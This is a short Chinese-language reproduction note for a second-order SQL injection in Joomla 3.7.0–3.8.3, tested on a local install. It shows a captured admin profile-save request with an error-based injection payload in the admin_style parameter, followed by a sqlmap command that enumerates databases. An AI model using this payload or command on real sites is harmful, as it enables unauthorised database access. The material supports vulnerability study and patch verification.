受影响Joomla版本:3.7.0 到 3.8.3
1、下载安装Joomla3.8.3,登录后台管理系统:http://127.0.0.1/joomla/administrator/index.php
2、访问编辑个人信息界面:
http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769
点击保存按钮,抓取数据包为(红色代码为测试payload):
POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 Content-Type: multipart/form-data; boundary=---------------------------132821454821567 Content-Length: 1875 Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[name]" savan -----------------------------132821454821567 Content-Disposition: form-data; name="jform[username]" savan -----------------------------132821454821567 Content-Disposition: form-data; name="jform[password2]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[password]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[email]" 2@qq.com -----------------------------132821454821567 Content-Disposition: form-data; name="jform[registerDate]" 2018-02-28 09:13:57 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[lastvisitDate]" 2018-03-01 06:29:04 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[id]" 771 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][admin_style][0]" extractvalue(1,concat(0x7e,(select version()) *)) -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][admin_language]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][language]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][editor]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][helpsite]" -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][timezone]" -----------------------------132821454821567 Content-Disposition: form-data; name="task" profile.apply -----------------------------132821454821567 Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583" 1 -----------------------------132821454821567--
3、sqlmap对上述数据包进行测试
sqlmap.py -r C:Users18721Desktop1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch
